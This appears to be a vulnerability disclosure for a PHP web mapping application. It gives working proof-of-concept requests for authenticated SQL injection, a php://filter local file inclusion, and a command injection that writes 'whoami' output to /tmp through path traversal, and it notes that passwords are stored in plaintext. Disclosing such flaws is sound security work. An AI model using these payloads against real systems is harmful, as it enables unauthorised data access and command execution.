- Authenticated (standard user) Union-based SQL injections on the page /v6/lib/xhr_data.php. The following POST parameters are vulnerable : "deb", "order", "nbpp" and "layer".
PoC :
cmd=getData&layer=1856+ORDER+BY+88&deb=1&order=&way=false&nbpp=1&h=791 => No error
cmd=getData&layer=1856+ORDER+BY+89&deb=1&order=&way=false&nbpp=1&h=791 => SQL error in the response
Passwords for webapp users are stored in plaintext and in Bcrypt format.
- With administrator’s privileges on the webapp, local file inclusion on the page /v5/admin/template.php. Only php files can be downloaded through the vulnerable GET parameter "page". PoC :
/v5/admin/template.php?page=php://filter/read=convert.base64-encode/resource=./log_user
The content of the page "log_user.php" will be included in base64 format inside the server response.
- Authenticated (standard user) command injection on the page /v6/lib/xhr_impconf.php. The POST parameters "input" and "output" are used to craft a system command under certain circumstances.
- PoC :
&urlPdf=a.pdf&PrevStateKey=BBOX%3D1509584.4653464085%2C3224940.898303422%2C1510919.468016414%2C3225740.899903425%7CSRS%3D%2Binit%3DEPSG%3A3944%7CMAPSIZE%3D%7CLAYERS%3Dquartiers_gq3%2CO%2CO%2CNom+de+voie%2Cselection%2Cv_projets_gq3_web%7CCLASSES%3D0%3B0%3B0%3B0%3B0%3B0%2C1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%7CSCALE%3D9999.980000006299&baseLayer=O&angle=O&units=O&opacity=O,-O,-O,-999,-999&formatp=A4&orip=paysage&echelle=5000&commentaire=O&titre=O+1&legendeimp=ok&legendeimppage=ok&miseForme=undefined&cmd=mergePdf&input={'':''}&output=../../../../../../dev/null;whoami+>+/tmp/z.php